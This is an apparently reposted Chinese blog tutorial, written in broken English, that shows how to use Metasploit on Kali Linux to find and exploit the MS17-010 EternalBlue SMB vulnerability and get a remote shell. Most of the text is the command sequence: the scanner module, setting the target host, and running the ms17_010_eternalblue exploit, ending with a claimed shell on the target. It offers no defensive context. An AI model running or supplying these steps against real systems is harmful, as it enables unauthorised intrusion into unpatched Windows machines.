zoukankan      html  css  js  c++  java
  • Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell

    Material:

            Computer 

            VMware 12

            Kali Linux.ISO

            Internet

    First:

        Open Your Computer and VMware:

    VMware Of KaliSecond Open Your SSH Connection Tools, Eg Securt CRT,Putty.......

    Input Msfconsole On Your Tools,

    Let's Wait For Him To Be Successful...............

    Ok,Screen Picture :

    Msfconsole


    Then We Input use auxiliary/scanner/smb/smb_ms17_010

                             Show options

    Set The Target Host IP Or IP Segment That You Need To Attack , Scan Them Leak ,And Know What Work Load Is Needed

                   My Attack Host Is 192.168.10.100 . This Is a Computer_Phone  Server

    Input : set rhosts 192.168.10.10    (  Attacted IP  )            

               Exploit


    Attack


    If The Interface Is Like This ,  It Means There Is A Vulnerability,

    So ,Let's Attack This Host.

    Input : use exploit/windows/smb/ms17_010_eternalblue

               show options

                set rhost 192.168.10.100

               Exploit    

     



    Successful Attack Host And Get Shell !!!!!!!!!

                

                

                                                                                                                                英文水平有限,兄弟们就将就讲究吧

  • 相关阅读:
    2019年湘潭大学程序设计竞赛(重现赛)
    牛客练习赛43
    2251: Code Cleanups
    【软件工程】读《构建之法》
    20150401 作业2 结对 四则运算
    四则运算
    Unity3d网格合并2
    Unity网格合并_材质合并
    Unity 5 Stats窗口
    Unity3D研究院之Unity5.x运行时动态更新烘培贴图
  • 原文地址:https://www.cnblogs.com/chk141/p/12220324.html
Copyright © 2011-2022 走看看